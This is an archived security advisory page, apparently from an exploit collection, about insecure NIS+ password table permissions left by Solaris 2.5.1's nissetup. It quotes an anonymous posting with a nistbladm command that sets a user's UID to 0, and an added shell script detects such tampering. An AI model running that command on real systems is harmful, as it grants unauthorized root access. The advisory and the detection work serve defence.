Insecure Solaris default nissetup password table permissions!
The nissetup.sh program for setting up NIS+ databases leaves insecure permissions on the password table. This allows you to, for example, use nistbladm to change your UID!
Unpatched Solaris 2.5.1 systems (possibly earlier versions of Solaris).
10 February 1996
Here is an anonymous posting reminding us of the problem. Also, Casper Dik (casper@HOLLAND.SUN.COM) mentioned that just installing the Solaris patch doesn't fix the problem. You need to manually reset the bad permissions. How many people do you think forgot to do that?
Date: Fri, 30 May 1997 19:44:40 +0200
From: Anonymous <nobody@REPLAY.COM>
Subject: NIS+, Solaris 2.5.1
Ever tried to change your NIS+ password with
the "nistbladm" command? Works fine, but you
can also change your UID ....
$ nistbladm -e uid=0 '[name=alice]',passwd.org_dir
$ niscat passwd.org_dir | grep alice
. . . . . . . . . . .
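Since installing the patch does not reset the table permissions, a site may also want to know whether any UID has already been altered. The script below is an added example, not part of the original page or posting: it compares two saved dumps of `niscat passwd.org_dir`, assuming colon-separated entries with the login name in field 1 and the uid in field 3. The function names, file names and sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added example: compare two saved dumps of `niscat passwd.org_dir`
# and report UID tampering of the kind shown in the posting.
# Assumption: entries are colon-separated with the login name in
# field 1 and the uid in field 3.

# uid_drift BASELINE CURRENT
#   CHANGED name old new  uid differs from the baseline dump
#   NEW name uid          entry not present in the baseline dump
#   UID0 name             non-root entry whose uid is 0
uid_drift() {
    awk -F: '
        FILENAME == ARGV[1] { base[$1] = $3; next }   # load baseline
        $1 == "" { next }                             # skip blank lines
        {
            if (!($1 in base))       print "NEW", $1, $3
            else if (base[$1] != $3) print "CHANGED", $1, base[$1], $3
            if ($3 ~ /^0+$/ && $1 != "root") print "UID0", $1
        }
    ' "$1" "$2"
}

# Demonstration on constructed sample data (not real accounts).
uid_drift_demo() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/baseline" <<'EOF'
root:x:0:1:Super-User:/:/sbin/sh:9999::::::
alice:x:1001:10:Alice:/home/alice:/bin/ksh:9999::::::
bob:x:1002:10:Bob:/home/bob:/bin/ksh:9999::::::
EOF
    cat > "$dir/current" <<'EOF'
root:x:0:1:Super-User:/:/sbin/sh:9999::::::
alice:x:0:10:Alice:/home/alice:/bin/ksh:9999::::::
bob:x:1002:10:Bob:/home/bob:/bin/ksh:9999::::::
carol:x:1003:10:Carol:/home/carol:/bin/ksh:9999::::::
EOF
    uid_drift "$dir/baseline" "$dir/current"
    rm -rf "$dir"
}

uid_drift_demo
```

A baseline taken from a backup that predates the exposure gives the most useful comparison; with an empty baseline every entry is reported as NEW and only the UID0 lines are meaningful.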
This page is part of Fyodor's exploit